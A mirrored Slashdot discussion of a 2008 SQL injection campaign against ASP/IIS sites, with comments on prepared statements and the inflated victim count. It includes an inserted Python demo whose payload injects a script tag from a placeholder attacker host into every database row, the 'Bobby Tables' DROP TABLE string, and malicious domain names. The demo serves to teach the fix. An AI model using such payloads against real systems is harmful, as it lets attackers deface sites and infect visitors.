Slashdot Mirror


500 Thousand MS Web Servers Hacked

andrewd18 writes "According to F-Secure, over 500,000 webservers across the world, including some from the United Nations and UK government, have been victims of a SQL injection. The attack uses an SQL injection to reroute clients to a malicious JavaScript at nmidahena.com, aspder.com or nihaorr1.com, which use another set of exploits to install a Trojan on the client's computer. As per usual, Firefox users with NoScript should be safe from the client exploit, but server admins should be alert for the server-side injection. Brian Krebs has a decent writeup on his Washington Post Security Blog, Dynamoo has a list of some of the high-profile sites that have been hacked, and for fun you can watch some of the IIS admins run around in circles at one of the many IIS forums on the 'net."

9 of 332 comments

  1. Bias? by jmpeax · Score: 5, Informative
    SQL injection is a result of poor data validation on the part of the web application - not, as the blurb implies, an indicator of an insecure web server. LAMP installations are also susceptible to SQL injection (PDF). From TFA:

    Unless [...] data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. As for the fact that Firefox + NoScript prevents the problems, that really isn't a surprise seeing as these specific exploits rely on executing a JScript. Any browser with scripting disabled would be immune.

    The tone of the blurb is not only biased but also counter-productive to promoting open source (as this appears to be its intention): by trying to criticise closed technologies not by highlighting their actual deficiencies but instead by spreading FUD, the whole community is done a disservice.
    1. Re:Bias? by Shados · Score: 5, Insightful

      I agree, and that was my first reaction: "Wtf does IIS have to do with SQL injection". If nothing else, a LAMP stack would be more susceptible, not because of the servers, but because PHP didn't have mainstream prepared statements as part of a default standard install in its earlier versions, and now that it DOES have it, a lot of script kiddies or peanut gallery programmers aren't using them, as opposed to Java/.NET/Whatever which, while still having some issues with the same group of newbie developers, are prepared-statement centric in their development paradigms and documentation, thus reducing the amount of possible SQL injection significantly, unless the apps are made in legacy environments too.

      It's such ridiculous flamebait, I don't know what to say.

    2. Re:Bias? by Stellian · Score: 5, Funny

      In fact, the attack enumerates all ASP variables and tries to force a SQL payload in them, that in turn if executed adds the link to the malicious script to every text field in the database. A very simple vulnerability scanner, if you like, targeting only ASP applications - thus the IIS spin.
      Since we don't see the LAMP version spreading I think we can safely conclude that no web application written in PHP with a MySQL back-end is currently vulnerable to any type of SQL injection.

  2. Re:epic lol by James+Kilton · Score: 5, Informative
    Wow. The responses on the forum http://forums.iis.net/t/1148917.aspx?PageIndex=1 are sad indeed. Windows Security patches DON'T protect against shittily built websites. My favorite:

    I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwrote that script into all of our products. Luckily a database restore fixed the problem. Two days later the same thing happened; I changed all the database and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing, but this time as the pages are loaded ActiveX is activated and wants to run, but of course I did not allow it. Has anybody successfully solved this situation? It truly sickens me how many web developers STILL don't know about SQL Injection.
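The Classic-ASP string-pasting Shados and Stellian describe, beside the prepared statement that defeats it, plus the post-incident check the quoted forum victim needed instead of repeated restores. This is an added example, not code from the thread or from any affected site; it uses sqlite3 as a stand-in for SQL Server, a placeholder host, and hypothetical function names.

```python
import sqlite3

# Constructed payload in the shape the thread describes: close the quoted value,
# append a script reference to every text field, comment out the rest. The host
# is a placeholder, not one of the domains named in the summary.
INJECTED_TAG = '<script src="http://attacker.invalid/1.js"></script>'
PAYLOAD = f"1'; UPDATE products SET description = description || '{INJECTED_TAG}'; --"

def new_db():
    # sqlite3 stands in for the SQL Server back-end behind the affected ASP sites.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, description TEXT)")
    conn.executemany("INSERT INTO products (description) VALUES (?)",
                     [("Red widget",), ("Blue widget",)])
    return conn

def lookup_vulnerable(conn, product_id):
    # Classic-ASP habit: the request value is pasted into the SQL text.
    # executescript() simulates the stacked statements SQL Server accepts.
    conn.executescript(f"SELECT description FROM products WHERE id = '{product_id}'")
    return [r[0] for r in conn.execute("SELECT description FROM products ORDER BY id")]

def lookup_safe(conn, product_id):
    # Prepared statement: the value is bound, never parsed as SQL, so the
    # payload is an ordinary string that matches no id.
    rows = conn.execute("SELECT description FROM products WHERE id = ?", (product_id,))
    return [r[0] for r in rows]

def find_injected(conn, table, column):
    # Incident check: ids of rows now carrying a script tag. Identifiers come
    # from code, not requests; only the pattern is a bound parameter.
    rows = conn.execute(f"SELECT id FROM {table} WHERE {column} LIKE ? ORDER BY id",
                        ("%<script%src=%",))
    return [r[0] for r in rows]

def strip_injected(conn, table, column, tag):
    # Targeted cleanup instead of the repeated full restores the victim describes;
    # returns rows repaired. The injection hole itself still has to be closed.
    cur = conn.execute(f"UPDATE {table} SET {column} = REPLACE({column}, ?, '') "
                       f"WHERE {column} LIKE ?", (tag, f"%{tag}%"))
    conn.commit()
    return cur.rowcount

if __name__ == "__main__":
    db = new_db()
    print(lookup_safe(db, PAYLOAD))        # []: bound value, nothing executed
    print(lookup_vulnerable(db, PAYLOAD))  # every description now ends with the tag
    print(find_injected(db, "products", "description"))  # [1, 2]
    print(strip_injected(db, "products", "description", INJECTED_TAG))  # 2
```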
  3. Re:ob... by ArcherB · Score: 5, Interesting

    Does it run on Linux? That is actually a good question and the first thing I thought of. While I'm not worried about my little web server being hacked as it runs on Linux without MySQL, I am worried about my browser.

    If I run Firefox on Linux without NoScript, is there a danger?

    --
    There is no "I disagree" mod for a reason. Flamebait, Troll, and Overrated are not substitutes.
  4. Re:This site makes me sick by MrMunkey · Score: 5, Insightful

    Anyone still getting hit with this in 2008 needs to be whacked on the head. This is true of any language, not just ASP. You can easily prevent SQL injection with Perl, Python, PHP, etc.
  5. 500,000? Where'd that number come from? by Robotron2084 · Score: 5, Informative

    Before you post such a headline, perhaps it would be a good idea to check your facts. I RTFA'ed and checked those links and there is no mention of how many servers were attacked. There were 510,000 pages mentioned, but pages do not equal servers. This is a sensationalistic headline based on a sensationalistic interpretation of a Google web search.

  6. Re:ob... by steelclash84 · Score: 5, Funny

    Did you really name your kid "Robert'); DROP TABLE Students; --"?

  7. Re:ob... by hclewk · Score: 5, Funny

    Oh, yes. Little Bobby Tables, we call him.